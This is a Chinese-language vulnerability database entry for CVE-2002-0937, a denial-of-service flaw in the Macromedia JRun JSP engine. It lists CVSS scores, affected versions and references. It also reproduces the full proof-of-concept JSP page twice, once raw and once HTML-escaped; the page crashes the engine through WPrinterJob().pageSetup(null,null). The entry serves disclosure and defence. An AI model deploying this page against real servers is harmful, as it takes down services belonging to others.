CVE-2002-0937
CVSS5.0
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:20
NMCOES    

[原文]The Java Server Pages (JSP) engine in JRun allows web page owners to cause a denial of service (engine crash) on the web server via a JSP page that calls WPrinterJob().pageSetup(null,null).


[CNNVD]Macromedia JRun JSP引擎远程拒绝服务攻击漏洞(CNNVD-200210-040)

        
        Macromedia JRun是一款Macromedia公司开发的Java 应用服务器,提供快速、可靠的J2EE兼容平台。
        Windows操作系统下的Macromedia JRun处理畸形JSP代码时存在漏洞,远程攻击者可以利用此漏洞进行拒绝服务攻击。
        JRun JSP引擎在处理如下畸形代码时存在漏洞:
        new WPrinterJob().pageSetup(null,null);
        攻击者可以构建包含如上代码的JSP页,当用户的JRun JSP引擎处理此页面时导致崩溃。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:macromedia:jrun:4.0Macromedia JRun 4.0
cpe:/a:macromedia:jrun:3.1Macromedia JRun 3.1
cpe:/a:macromedia:jrun:3.0Macromedia JRun 3.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0937
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0937
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-040
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4997
(VENDOR_ADVISORY)  BID  4997
http://www.iss.net/security_center/static/9339.php
(VENDOR_ADVISORY)  XF  jsp-engine-wprinterjob-dos(9339)
http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0095.html
(UNKNOWN)  VULNWATCH  20020611 [VulnWatch] Generic Crash-JSP

- 漏洞信息

Macromedia JRun JSP引擎远程拒绝服务攻击漏洞
中危 其他
2002-10-04 00:00:00 2005-10-20 00:00:00
远程  
        
        Macromedia JRun是一款Macromedia公司开发的Java 应用服务器,提供快速、可靠的J2EE兼容平台。
        Windows操作系统下的Macromedia JRun处理畸形JSP代码时存在漏洞,远程攻击者可以利用此漏洞进行拒绝服务攻击。
        JRun JSP引擎在处理如下畸形代码时存在漏洞:
        new WPrinterJob().pageSetup(null,null);
        攻击者可以构建包含如上代码的JSP页,当用户的JRun JSP引擎处理此页面时导致崩溃。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 加强服务器本地权限管理,不要放置恶意脚本。
        厂商补丁:
        Macromedia
        ----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.macromedia.com/software/jrun/

- 漏洞信息 (21536)

Macromedia JRun 3/4 JSP Engine Denial Of Service Vulnerability (EDBID:21536)
windows dos
2002-06-12 Verified
0 Marc Schoenefeld
N/A [点击下载]
source: http://www.securityfocus.com/bid/4997/info

A vulnerability has been reported in Macromedia JRun for Windows that results in a denial of service condition. The vulnerability occurs when JRun encounters a malicious JSP page.

The following snippet of code is reported to crash the JRun JSP engine:
new WPrinterJob().pageSetup(null,null);

<%@ page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1"
%>
<%@ page import="sun.awt.windows.*" %>
<%! %>
<%
//
%>
<html>
<head>
<title>aa</title>
</head>
<body>

<p>
<FONT SIZE="+2">dON/T TR1 thiz @ home</font>
</p>
<%
new WPrinterJob().pageSetup(null,null);
%>

</body>
</html> 		

- 漏洞信息

34886
Macromedia JRun Java Server Pages (JSP) WPrinterJob() Function DoS
Denial of Service
Loss of Availability

- 漏洞描述

- 时间线

2002-06-11 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Macromedia JRun JSP Engine Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 4997
Yes No
2002-06-12 12:00:00 2009-07-11 01:56:00
Discovery credited to Marc Schoenefeld <marc.schoenefeld@uni-muenster.de>.

- 受影响的程序版本

Macromedia JRun 4.0
- Microsoft IIS 5.1
- Microsoft IIS 5.0
- Microsoft IIS 4.0
Macromedia JRun 3.1
- IBM AIX 4.3
- IBM AIX 4.2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- SGI IRIX 6.5
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Macromedia JRun 3.0
- IBM AIX 4.3
- IBM AIX 4.2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- SGI IRIX 6.5
- Sun Solaris 7.0
- Sun Solaris 2.6

- 漏洞讨论

A vulnerability has been reported in Macromedia JRun for Windows that results in a denial of service condition. The vulnerability occurs when JRun encounters a malicious JSP page.

The following snippet of code is reported to crash the JRun JSP engine:
new WPrinterJob().pageSetup(null,null);

- 漏洞利用

The following proof of concept was provided by Marc Schoenefeld &lt;marc.schoenefeld@uni-muenster.de&gt;:

&lt;%@ page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1"
%&gt;
&lt;%@ page import="sun.awt.windows.*" %&gt;
&lt;%! %&gt;
&lt;%
//
%&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;aa&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;

&lt;p&gt;
&lt;FONT SIZE="+2"&gt;dON/T TR1 thiz @ home&lt;/font&gt;
&lt;/p&gt;
&lt;%
new WPrinterJob().pageSetup(null,null);
%&gt;

&lt;/body&gt;
&lt;/html&gt;

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站